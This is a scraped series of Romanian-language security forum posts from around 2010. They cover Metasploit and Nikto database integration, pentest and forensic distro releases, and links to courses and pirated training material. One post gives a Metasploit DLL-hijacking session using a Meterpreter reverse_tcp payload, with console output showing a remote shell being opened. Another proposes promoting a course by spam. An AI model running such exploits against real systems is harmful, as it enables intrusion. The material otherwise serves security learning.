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  11. Metasploit aduce foarte multe facilit??i de baz? pentru testarea de aplicatii web cu el. Din acest motiv, este firesc s? utilizeze pentru screening-ul de securitate de servere Web ?i aplica?ii Web mai multe instrumente. --------------------------------------------------------------------------------------- În cazul în care vine vorba de folosirea rezultatelor externe instrumente în date suplimentare sau stocuri de documentare, iar punctul focal pentru Metasploit msfconsole ?i sprijinul lor de baze de date prevede este pierdut. Nikto Începând cu versiunea 2.1.3 op?iunea privind serviciul RPC, punctele slabe identificate ?i a partaja informa?ii cu Metasploit. Aceast? posibilitate creeaz? o func?ionalitate unificat de logare, care s? permit? o analiz? ulterioar? a Metasploit o baz? de date central?. --------------------------------------------------------------------------------------- root@bt:~# cd /opt/metasploit35-dev/msf3/ root@bt:/opt/metasploit35-dev/msf3# ./msfconsole __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 322 exploits - 99 auxiliary + -- --=[ 217 payloads - 20 encoders - 6 nops =[ svn r11149 updated today (2010.11.25) msf > version Framework: 3.5.1-dev.11003 Console : 3.5.1-dev.11003 msf > load xmlrpc ServerType=Web [*] XMLRPC Service: [*] XMLRPC Username: msf [*] XMLRPC Password: HlwLdvKY [*] XMLRPC Server Type: Web [*] XMLRPC Web URI: /RPC2 [*] Successfully loaded plugin: xmlrpc msf > db_driver sqlite3 [*] Using database driver sqlite3 msf > db_connect test-nikto [-] Note that sqlite is not supported due to numerous issues. [-] It may work, but don't count on it [*] Successfully connected to the database [*] File: test-nikto --------------------------------------------------------------------------------------- Dac? baza de date de testare este creat ?i a început serviciul RPC ar trebui s? fie verificate cu netstat: root@bt:~/msf-installers/nikto-2.1.3# netstat -anpt | grep 55553 tcp 0 0* LISTEN 21223/ruby --------------------------------------------------------------------------------------- Odat? ce totul ieste in regula, pot fi utilizate dup? cum urmeaz? Nikto. Importante sunt op?iunile de format ?i op?iuni suplimentare MSF MSF-o: @ HlwLdvKY http://localhost:55553/RPC2 care specific? serviciul RPC: root@bt:~/msf-installers/nikto-2.1.3# ./nikto.pl -Format msf -o msf:HlwLdvKY@http://localhost:55553/RPC2 -h demo.testfire.net - Nikto v2.1.3 --------------------------------------------------------------------------- + Target IP: + Target Hostname: demo.testfire.net + Target Port: 80 + Start Time: 2010-11-27 10:06:49 --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved x-powered-by header: ASP.NET + Retrieved x-aspnet-version header: 2.0.50727 + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "". + Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + OSVDB-3092: /bank/: This might be interesting... + OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico) --------------------------------------------------------------------------------------- În urma auditului efectuat este în baza de date urm?toarele comenzi cu msfconsole db_vulns, db_notes db_host ?i interogare a informa?iilor: msf > db_notes [*] Time: Fri Nov 26 09:06:51 UTC 2010 Note: host= type=nikto.999986 data={"result"=>"", "uri"=>"/ofQywa1R.aspx", "method"=>"GET", "message"=>"Retrieved x-aspnet-version header: 2.0.50727"} [*] Time: Fri Nov 26 09:07:38 UTC 2010 Note: host= type=nikto.600376 data={"result"=>"", "uri"=>"/", "method"=>"HEAD", "messa-ge"=>"Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5)"} [*] Time: Fri Nov 26 09:07:39 UTC 2010 Note: host= type=nikto.999990 data={"result"=>"", "uri"=>"/", "method"=>"GET", "messa-ge"=>"Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST "} [*] Time: Fri Nov 26 09:07:39 UTC 2010 Note: host= type=nikto.999985 data={"result"=>"", "uri"=>"/", "method"=>"GET", "messa-ge"=>"Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST "} <snip> scuze de gramatica
  12. Downloads | BackTrack Linux - Penetration Testing Distribution Yes, the time has come again – for a new kernel, and a new release of BackTrack. Codenamed “Nemesis”. This release is our finest release as of yet with faster Desktop responsiveness, better hardware support, broader wireless card support, streamlined work environment. We could go on for pages on saying how great the new version is, but we’ll cut to the chase, and give you the run down: * Kernel – *Much* improved mac80211 stack. * USB 3.0 support. * New wireless cards supported. * All wireless Injection patches applied, maximum support for wireless attacks. * Even *faster* desktop environment. * Revamped Fluxbox environment for the KDE challenged. * Metasploit rebuilt from scratch, MySQL db_drivers working out of the box. * Updated old packages, added new ones, and removed obsolete ones. * New BackTrack Wiki with better documentation and support. * Our most professional, tested and streamlined release ever. For those wanting to upgrade an older release of BT4, an apt-get update && apt-get dist-upgrade should do the job. care aveti backtrack r1 puteti sa faceti update la bt r2 Upgrading - BackTrack Linux care vreti sa va creati backtrack complect pe cd Customization - BackTrack Linux
  13. problema ii de la china din 2007 ,2008 si asa mai departe or atacat jumate din europa si direct pe nemti in parlament si spionaj industrie si pe americani,acuma vor sa interzica tot, si vor pina in 2014 sa introduca un fel de European Computer Driving Licence in toata europa (atacul vine direct din china de la organizatia chineza scloys si presupun nemtii ca mai au trojan dar nu le gasesc in pc) care incelege germana uitativa la reportajul asta YouTube - Angriff auf Berlin 1/4
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  15. Justin Searle was so kind to release the latest version of Samurai Webapplication Testing Framework made for the BruCON workshops. This is the latest version with the latest tools and will now be published during BruCON http://blog.brucon.org/2010/09/samurai-wtf-09-brucon-pre-release.html Be aware is that this version has some bugs. Use at own risk. They are working on another update to be released soon! Source: Main Page - BruCON 2010
  16. Si eu sint de acord si convins ca asa poti sa opti mai mult pe cale pasnica,si pe linga ce a scris B7ackAnge7z putem sa oferim noi un curs sa facem un curs (tip video tutorial) cu donatie primul curs de exemplu sa cuprinda numai aparare ca multa lume inca nu stie ce pericol il asteapta pe net. un curs ce cuprinde keylogger,trojan,etc...pentesting de exemplu cum functioneaza un e-mail Phishing atack dar nu areti tot cum functioneaza areti numai la suprafata si specifici pentru ce sint banii de la donatie al doilea curs cu 3 euro si specifici pentru ce sint banii pe linga asta mai facem un curs pentru interesati in domeniu hack un fel de pentest sau alt fel de curs ca doar sintem o gramada aicia si fiecare ii bun in categoria lui facem video tutorial cu explicatie fiecare in domenu lui, ne incelegem binenceles inainte fiecare ce categorie si le incarcam pe net ,dar nu aicia pe forum si trimitem linkul cu video la nemesis (la administartori forumului) si voi alegeti si cei bun deintre video si creiati un un curs din toate videourile care vin (wallpaper unul dintre voi sa faca un wallpaper pe care il folosim toti dintre noi ca Desktop background) dupa ce facem cursurile aunci trimitem spam cu cursul si scopul si iti garantez ca sint o gramada care sint interesati numai sa puii copii din ro scuze de gramatica si scris
  17. salut aicia sint niste video cu metasploit Metasploit Class Videos (Hacking Illustrated Series InfoSec Tutorial Videos) sau pe YouTube - Metasploit Class Videos
  18. neox


    daatdraqq daca iesti de acord til dau tie sa il retranscri corect pe romineste cind ii gata dar o sa dureze un pic pina ii gata Continut curs Aici este o list? de LPIC 1 - Teme ?i greutatea acestuia (greutate - Subiect): Examinarea 101: * Subiect 101 - Arhitectura sistemului O identifica configura 2 - set?ri hardware O 3 - Demararea sistemului O 3 - schimba nivelul de execu?ie ?i a opri sistemul sau reporni?i * Subiect 102 - instalarea Linux ?i de administrare a pachetelor O 2 - sunt de planificare layout disc O 2 - un manager de boot a instala O Gestiona?i o - biblioteci partajate O 3 - utilizarea de administrare a pachetelor Debian O 3 - RPM ?i pachetul de management YUM utilizând comenzi * Subiect 103 - GNU ?i Unix O 4 - Lucrul în linia de comand? Textul O 3 - Procesul de fluxuri folosind filtre O 4 - gestionarea fi?ierelor de baz? O 4 - curenti, folosind ?evi ?i redirec?ionarea O 4 - Crea?i procese pentru a monitoriza ?i opri O 2 - priorit??ile de execu?ie procesul de schimbare O 2 - C?utare text fi?iere folosind expresii regulate O 3 - editarea fi?ierelor de baz? cu vi * Subiect 104 - Echipamente, sisteme de fi?iere Linux, sistemul de fi?iere Ierarhia standard O 2 - Crearea parti?iilor ?i sistemelor de fi?iere O 2 - Asigurarea integrit??ii sistemele de fi?iere O Controlul 3 - montarea ?i demontarea sistemelor de fi?iere O 1 - gestiona cotele de disc O 3 - permisiunile de fi?iere ?i de gestionare a propriet??ii O 2 - hard ?i leg?turi simbolice, crea?i ?i s? modifica?i O 2 - G?se?te fi?ierele de sistem ?i fi?iere loc în locul potrivit Examinarea 102: * Subiect 105 - scoici, script-uri ?i de administrare a datelor O 4 - Particulariza?i mediu coaj? ?i utilizarea O 4 - Usor de a scrie script-uri sau adapta O 2 - SQL Data Management * Subiect 106 - suprafe?e ?i desktop O 2 - instalarea ?i configurarea X11 ?i O 2 - Crearea unui display manager O 1 - ajutor pentru persoane cu handicap * Subiect 107 - sarcini administrative O Administreaza 5 - conturi de utilizator ?i de grup ?i fi?iere legate de sistemul de O 4 - s? automatizeze sarcini de administrare de sistem de planificare de locuri de munc? O 3 - Localizare si Internationalizare * 108 Subiect - servicii de baz? Sistem O 3 - Gestionarea timp sistem O 2 - Sistemul de Logging O 3 - Bazele de agen?i de transfer Mail (MTAs) O 2 - imprimante Administreaza ?i procesele de imprimare * Subiect 109 - Re?eaua Fundamentele O 4 - Bazele de protocoale Internet O 4 - de baz? de configurare a re?elei O 4 - Re?eaua de baz? depanare O 2 - Client-DNS configura * Subiect 110 - Securitate O 3 - ?i îndeplini sarcinile administrative pentru securitate O 3 - Un calculator sigur O 3 - pentru a proteja datele prin criptare
  19. salut am facut un tutorial demo (deci ii numa demo)sub forma de pdf dar cind ii gata il fac si in pdf si in powerpoint präsentation intrebarea mea ii sinteti interesati de asa ceva, ca nu vreu sa il fac daca nu va intereseza ca ii mult de lucru si poate multi dintre voi stiti deja si la fiecare capitol fac un examen simulator sa va testati aicia ii demo sa vedeti cum ie Lpic-1.pdf rog un admin sa sterga dupa citeva zile
  20. america ii tara frumoasa dar si lor le merge greu cu criza si la iei nu mai sint bani si sint o gramada de oameni care au perdut tot cu criza ca la noi, iti spun din experienta voi multi va plingeti de romania, cai greu si naspa dar sa stiti ca ii o diferenta sa te duci in vizita sau sa traiesti acolo. vb de usa dar deviez un pic de la tema eu traiesc de ani de zile in germania si ii naspa ii o viata ca un robot ,eu daca nu ma duc o data pe an acasa o iau razna inebunesc. Diferenta care ii germania: traiesti bine ai tot ce vrei mincare,bautura,electronica,masina etc.. tot ce iti doresti Ai o viata ca un robot la lucru si acasa . Despre mincare ce sa zic (in europa tärile mai dezvoltate si usa cei mai multi oameni grasi) luam un exemplu eu daca vreu sa cumpar rosii trebuie sa am noroc sa gasesc rosi ca la noi aicia ii plastic cu apa rosia Nu ai prieteni,adica ai dar nici o data nu te intelegi cu iei ca la noi (alta mentalitate) trebuie sa fii nascut in germania sa te incelegi cu iei Exemplu prieten de ani de zile o vizitat si rominia, dar sa zicem facem gratare la mine in curte sau la iel fiecare isi aduce carnea de acasa ,checeap,maioneza si sarea si piperul de acasa si nu numai iel ii asa toti sint asa toti pe line (si sacul cu carbuni facem jumi juma) no prietenul are copii si un copil ii pofticios si eu am cirnat pe gratar, prietenul are alceva nu ii da voi la copil daca cere o bucata de cirnat sa iei de la mine (raspunsul lui nu ii da lasa ca ii iau si lui data vitoare ca doar tu lucrezi pentru banii pe care iai dat pe cirnat) vizite dau telefon ce faci mine pot sa vin pina la tine in vizita raspuns stai sa o intreb si pe nevasta no bun o intraba si iti spune mine nu se poate ca trebuie sa spalam haine (de zici ca iel le spala cu mina ) alt prieten faci afaceri preitenul: ba nu iti trebuie un leptop ca vreau sal vind eu:cit ceri pe iel prietenul :ba fi atent am fost cu iel la consignatie (second-hand) si o zis ala ca imi da 200€ dar tie ca imi iesti prieten til dau cu 250 € eu: ba prostule la ala de la second-hand ca ii strain si nu il cunosti si il dai cu 200 si mie ca te cunosc de ata timp imi ceri 250 ma pur si simplu iel vede ca ii ceva normal si nu iti ramine decit sa ii spui ba nu imi trebuie dute si vindel altundeva inca ceva nu ai libertatea care o ai la noi sa faci ce vrei tu de exemplu daca nu am curte si vreu sa fac un gratar posibiltitatile sint urmatoarele ma duc undeva la padure sau la un riu la iarba verde no aprind gratarul dupa 5 minute apar pompieri iti stinge focul si iti da amenda deici nu ai unde sa te duci decit in loc public sa faci gratar dar acolo ii plin nu ai voie cu gratarul tau de acasa trebie sa faci la gratrul lor de beton si platit la pescuit mo prins fara permis am luat 390€ amenda no am zis ca ma duc sa fac permisul (care ii problema la iei au voie si pescari care au permis sa te controleze ) in fine ma duc sa imi fac permis intru in cladire sa iau ceva info imi spune permisul coasta 100 de euro pe an dar numai la balta la riu mai mult sau la mare no bun am zis ba asta ii ce sa fac ok sint de acord, no stai ca acuma vine partea grea si imi da o carte si formulare ba ca la scoala de soferi inveti si dai examen (270€ costa examenul) ca sa iei permisul de pescuit mam lasat si sint pescar inrait dar nu iera problema de bani problema ii absurditatea care ii si multi romini care am cunoscut aicia sint la fel foarte putini raimn ca la noi in tara de treaba tigara aruncata jos 25€ amenda a doua oara 70€ (daca ai voie sa fumezi numai in anumite locuri) si cea mai tare faza eu am permis de conducere daca ma prinde beat pe bicicleta imi ia permisul de conducere ca oameni sint foarte rai eu daca as mai putea sa dau timplu inapoi nasi mai ramine aicia pentru nimic in lume cel mai bine ii acasa in ro chiar daca nu ai banii multi acuma lucrez in domniu pc dar inainte 5 anii am lucrat in domeniu wind turbine (producatoare de curent electric) care iera munca toata ziua umblam cu inca un tip, mergem cu masina pe cimp si controlam daca sa invirte elicia de la turbina (plitisela no sa nu imi dau glont) sucuze de gramatica si scris
  21. danke ICEBREAKER uite aicia CCNA FREE ii foare bun Free CCNA Lab Workbook Video Table of Contents | Free CCNA Workbook
  22. CAINE 2.0 (code name "NewLight") and NBCaine 2.0 Released CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a project of Digital Forensics.CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface. The main design objectives that CAINE aims to guarantee are the following: http://2.bp.blogspot.com/_xJ5LrusWfss/TI_BDHlcJgI/AAAAAAAAAmY/1qC0NmG4lfY/s1600/caine2.0.jpg -an interoperable environment that supports the digital investigator during the four phases of the digital investigation -a user friendly graphical interface -a semi-automated compilation of the final report Download and more info: CAINE Live CD - NewLight computer forensics digital forensics ------------------------------------------------------- DVWA 1.0.7 released Damn Vulnerable Web Application Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing. What’s new? The vulnerability help page has been improved. We now display the logged on username along with the vulnerability level and php-ids status. Blind SQL injection has been implemented. We now have official documentation. You can now compare all vulnerable source code in one page with the ‘view all’ button. The whole theme has been redesigned, including a new great looking logo. Many bug fixes and small changes throughout the application. But that’s not all, we have continued the work that Duncan Alderson had done on the 1.0.6 LiveCD, as the LiveCD proved to be a great success. The new LiveCD is not only a vulnerable web application but also a badly configured web server which includes many server misconfiguration. Download and more info: Damn Vulnerable Web App - DVWA --------------------------------------------------- NetSecL 3.0 Released The new version of NetSecL 3.0 is a live DVD + installation based on OpenSuse. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools OR if you like to do some penetration testing you can directly run all tools from the live DVD. The password for both admin and root user on the DVD is linux NetSecL firewall is included as always and most of the penetration tools are ported to the new platform. Also we'd like to mention that we've got many other programs up and running with GrSecurity enabled, which is great success especially when it comes to programs like wine, OpenOffice, Vuze, Qemu and many gnome applications. Warning: when you install use ext3 (tested) for root partition. Minimal System Requirements for running the live DVD: 512 MB of RAM Minimal System Requirements for installing: 1 GB of RAM, 5 GB partition at least (SATA-tested) With that said we think that the new version of NetSecL is fully function as a Desktop,Server and Penetration testing environment. For more info and download check NetSecL Project ----------------------------------------------------------- VIPER VAST Live Distro beta 2.77 Realeased VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. VAST also has built into synaptic package manager a third party repository link for the VIPER tools, so when we update a tool it's as easy as "apt-get" http://2.bp.blogspot.com/_xJ5LrusWfss/TGVx7XQJ6SI/AAAAAAAAAi0/z70ZHzmyeMo/s1600/screen2.png Version 2.77 now includes Artemisa a VoIP Honeypot. From Artemisa: "Artemisa is a VoIP/SIP-specific honeypot software designed to connect to a VoIP enterprise domain as a user-agent back end in order to detect malicious activity at an early stage. Moreover, the honeypot can play a role in the real-time adjustment of the security policies of the enterprise domain where it is deployed." Download: SourceForge.net: Download and Develop Open Source Software for Free - VIPER VAST Live Distro -------------------------------------------------------------------- Forensic Toolkit (FTK) Version 3 THE INDUSTRY-STANDARD COMPUTER FORENSICS SOFTWARE USED BY GOVERNMENT AGENCIES AND LAW ENFORCEMENT AROUND THE WORLD http://3.bp.blogspot.com/_xJ5LrusWfss/TGEKbUi-7eI/AAAAAAAAAiU/VCIPK9Eui9E/s1600/FUCK+YOU!.jpg Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford. Download: AccessData delivers computer forensics, cyber security, incident response, eDiscovery and information assurance software solutions. review-access-data-forensic-toolkit-ftk-version-3-part-1/ https://blogs.sans.org/computer-forensics/2010/08/09/review-access-data-forensic-toolkit-ftk-version-3-part-1/ ---------------------------------------------------------------------------------- SECmic3 - Security Distro A Kubuntu 10.04 LTS Lucid Lynx based security distro http://3.bp.blogspot.com/_xJ5LrusWfss/TF2rtylA2wI/AAAAAAAAAhE/v8KP5G_IrtI/s1600/SECmic3-desktop-menu.png SECmic3 is a Kubuntu 10.04 LTS Lucid Lynx based security distribution. It is FREE to download, and will be forever. It comprises over 200 security oriented applications preinstalled. SECmic3 is Ubuntu/Kubuntu update compatible. Meaning you will be able to receive security updates directly from the Ubuntu/Kubuntu repositories for the lifetime of this Kubuntu 10.04 LTS based release. Get SECmic3 from: http://secmic.org SECmic3-security-pentest on Vimeo ( video demo ) ------------------------------------------------------------------------------------ Network Security Toolkit (NST v2.13.0) Network Security Toolkit (NST) is a bootable ISO image (Live CD) based on Fedora Core 11 providing easy access to best-of-breed Open Source Network Security Applications and should run on most x86 platforms. NST can also be used for crash recovery. This release will include many geolocation enhancements for both Wireshark and Ntop. One can now geolocate Wireshark IPv4 Address conversations or Ntop hosts on a Mercator World Map projection or on an Earth Browser (i.e., Google Earth). See the Overview page on the NST Wiki Site for hourly generated maps demonstrating the Ntop hosts geolocation implementation. Download: SourceForge Downloads ------------------------------------------------------------------------------------ Wintaylor 2.0 Live Analysis and Incident Response tool WinTaylor is the new forensic interface built for Windows and included in CAINE Live CD. It is written in Visual Basic 6 to maximize compatibility with older Windows systems, and provides an internal set of well-known forensic programs. WinTaylor proposes a simple and complete forensic software integration and inherits the design philosophy of CAINE. To ensure transparency of the operations performed by WinTaylor during its execution, we have made available the source code of the program, that is licensed under the Lesser GPL License 2.1. The code is visible and editable, for the benefit of developers and to preserve the good standards of open source forensic software. The interface is structured in the familiar CAINE’s tabs style, and implements the well-known reporting system to record the investigative sessions. Features Report creation tool, that saves in a plain and portable text file the list of used programs with time-stamps . Tabbed structure that gives a logical schema to the investigation process. Command-line tools that print their output inside WinTaylor. Updated Sysinternals tools Versatile hashing tool Snapshot tool http://2.bp.blogspot.com/_xJ5LrusWfss/TDDtesmdTfI/AAAAAAAAAfE/gCaTVG6a8tQ/s1600/1.jpg Download: CAINE Live CD - NewLight computer forensics digital forensics ------------------------------------------------------------------------------------- Live HACKING CD New Linux Distribution for Ethical Hacking and Penetration Testing Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders. http://4.bp.blogspot.com/_xJ5LrusWfss/S-6L-wu0nII/AAAAAAAAAa4/KyzDCSksbQ4/s1600/Live-Hacking-CD.gif The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools. The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included. Download: SourceForge.net: Download and Develop Open Source Software for Free --------------------------------------------------------------------------------------- DEFT Linux 5.1 Released DEFT Linux Computer Forensic Live CD DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs http://4.bp.blogspot.com/_xJ5LrusWfss/S-G6VBzwp2I/AAAAAAAAAZw/XLT47daE9u4/s1600/forensic-software.png What’s new? Update: Sleuthkit 3.1.1 and Autopsy 2.24 Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP) Update: Initrd Bug fix: Dhash report (reports were not generated) Bug fix: DEFT Extra bug fix (a few tools did not work if the operator click on their icons, added the dd tool for x64 machines) Download: DEFT Linux - Computer Forensics live cd -------------------------------------------------------------------------------------- EmErgE's MultiISO LiveDVD 2.0 MultiISO LiveDVD is an integrated Live DVD technology which combines some of the very popular Live CD ISOs already available on the internet. It can be used for security reconnaissance, vulnerability identification, penetration testing, system rescue, media center and multimedia, system recovery, etc. It's a all-in-one multipurpose LiveDVD put together. foto http://1.bp.blogspot.com/_xJ5LrusWfss/S7d6_ApXlPI/AAAAAAAAAVo/vnKGa-TYcwA/s1600/multiiso-livedvd-2.0.png MultiISO LiveDVD 2.0 consists of following distros: Backtrack 4 GeeXBoX Damn Small Linux Clonezilla Offline NT Password & Registry Editor FreeDOS Damn Vulnerable Linux Trinity Rescue Kit Tiny Core Linux Helix 3 Puppy Linux Byzantine OS Pentoo Linux Dban boot.kernel.org (bko) Download: http://binarybum.com/MultiISO-2.0-final.iso Torrent Link: http://badfoo.net more info: badfoo.net -------------------------------------------------------------------------------------- SANS Investigative Forensic Toolkit Workstation: v2.0 Released SANS Investigative Forensic Toolkit (SIFT) Workstation: Version 2.0 The SANS SIFT Workstation is a VMware Appliance that is pre-configured with all the necessary tools to perform a detailed digital forensic examination. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The brand new version has been completely rebuilt on an Ubuntu base with many additional tools and capabilities that can match any modern forensic tool suite. File system support Windows (MSDOS, FAT, VFAT, NTFS) MAC (HFS) Solaris (UFS) Linux (EXT2/3) Software Includes: The Sleuth Kit (File system Analysis Tools) log2timeline (Timeline Generation Tool) ssdeep & md5deep (Hashing Tools) Foremost/Scalpel (File Carving) WireShark (Network Forensics) Vinetto (thumbs.db examination) Pasco (IE Web History examination) Rifiuti (Recycle Bin examination) Volatility Framework (Memory Analysis) DFLabs PTK (GUI Front-End for Sleuthkit) Autopsy (GUI Front-End for Sleuthkit) PyFLAG (GUI Log/Disk Examination) http://4.bp.blogspot.com/_xJ5LrusWfss/S6yoY9QarzI/AAAAAAAAAVI/6dmQkMmB-B4/s1600/sift-ptk-big.jpg More info and Download: SANS - Computer Forensics and e-Discovery with Rob Lee
  23. ca sa nu mai deschid un nou post voi posta aicia Offensive Security 101 V1 deci ii cu backtrack 2 sa stiti ca sa nu ma injurati:) poate sint care nu au versiunea 1 si are nevoie Labs: MEGAUPLOAD - The leading online storage and file delivery service Lab Guide: MEGAUPLOAD - The leading online storage and file delivery service Videos: MEGAUPLOAD - The leading online storage and file delivery service MEGAUPLOAD - The leading online storage and file delivery service MEGAUPLOAD - The leading online storage and file delivery service si Offensive-Security cu Bt3 sub forma de pdf http://www.megaupload.com/?d=D1X8HXBS http://depositfiles.com/files/p912ii23u http://www.badongo.com/file/23861476 http://www.easy-share.com/1911856216/offensive-security-labs-khi3mkp-bt3.pdf
  24. 01. Olly + assembler + patching a basic reverseme 02. Keyfiling the reverseme + assembler 03. Basic nag removal + header problems 04. Basic + aesthetic patching 05. Comparing on changes in cond jumps, animate over/in, breakpoints 06. "The plain stupid patching method", searching for textstrings 07. Intermediate level patching, Kanal in PEiD 08. Debugging with W32Dasm, RVA, VA and offset, using LordPE as a hexeditor 09. Explaining the Visual Basic concept, introduction to SmartCheck and configuration 10. Continued reversing techniques in VB, use of decompilers and a basic anti-anti-trick 11. Intermediate patching using Olly's "pane window" 12. Guiding a program by multiple patching. 13. The use of API's in software, avoiding doublechecking tricks 14. More difficult schemes and an introduction to inline patching 15. How to study behaviour in the code, continued inlining using a pointer 16. Reversing using resources 17. Insights and practice in basic (self)keygenning 18. Diversion code, encryption/decryption, selfmodifying code and polymorphism 19. Debugger detected and anti-anti-techniques 20. Packers and protectors : an introduction 21. Imports rebuilding 22. API Redirection 23. Stolen bytes 24. Patching at runtime using loaders from lena151 original 25. Continued patching at runtime & unpacking armadillo standard protection 26. Machine specific loaders, unpacking & debugging armadillo 27. tElock + advanced patching 28. Bypassing & killing server checks 29. Killing & inlining a more difficult server check 30. SFX, Run Trace & more advanced string searching 31. Delphi in Olly & DeDe 32. Author tricks, HIEW & approaches in inline patching 33. The FPU, integrity checks & loader versus patcher 34. Reversing techniques in packed software & a S&R loader for ASProtect 35. Inlining inside polymorphic code 36. Keygenning 37. In-depth unpacking & anti-anti-debugging a combination packer / protector 38. Unpacking continued & debugger detection by DLL's and TLS 39. Inlining a blowfish scheme in a packed & CRC protected dll + unpacking Asprotect SKE 2.2 40. Obfuscation and algorithm hiding Hotfile.com: One click file hosting: Reversing for Newbies Series.rar
  25. eu cred ca te referi la asa ceva te uiti la video tse.rar sau asa Filetype endump msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump EXTENSIONS => endump msf exploit(webdav_dll_hijacker) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS endump yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(webdav_dll_hijacker) > exploit [*] Exploit running as background job. [*] Started reverse handler on [*] [*] Exploit links are now available at \\\documents\ [*] [*] Using URL: [*] Server started. msf exploit(webdav_dll_hijacker) > [*] PROPFIND /documents [*] PROPFIND => 301 (/documents) [*] PROPFIND /documents/ [*] PROPFIND => 207 Directory (/documents/) [*] PROPFIND /documents [*] PROPFIND => 301 (/documents) [*] PROPFIND /documents/ [*] PROPFIND => 207 Directory (/documents/) [*] PROPFIND => 207 Top-Level Directory [*] PROPFIND /DOCUMENTS [*] PROPFIND => 301 (/DOCUMENTS) [*] PROPFIND /DOCUMENTS/ [*] PROPFIND => 207 Directory (/DOCUMENTS/) [*] PROPFIND => 207 Top-Level Directory [*] PROPFIND /documents/rsaenh.dll [*] PROPFIND => 207 File (/documents/rsaenh.dll) [*] PROPFIND /DOCUMENTS [*] PROPFIND => 301 (/DOCUMENTS) [*] PROPFIND /DOCUMENTS/ [*] PROPFIND => 207 Directory (/DOCUMENTS/) [*] PROPFIND => 207 Top-Level Directory [*] GET => DLL Payload [*] PROPFIND /documents/SDDisk.dll [*] PROPFIND => 207 Directory (/DOCUMENTS/) [*] PROPFIND => 207 Top-Level Directory [*] Sending stage (748544 bytes) to [*] Meterpreter session 14 opened ( -> msf exploit(webdav_dll_hijacker) > sessions -i 14 [*] Starting interaction with 14... meterpreter > getuid Server username: root-Vista\neox ----------------------------------------------------------------------------------------- PGP - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp EXTENSIONS => pgp msf exploit(webdav_dll_hijacker) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS pgp yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(webdav_dll_hijacker) > exploit [*] Exploit running as background job. [*] Started reverse handler on [*] [*] Exploit links are now available at \\\documents\ [*] [*] Using URL: [*] Server started. 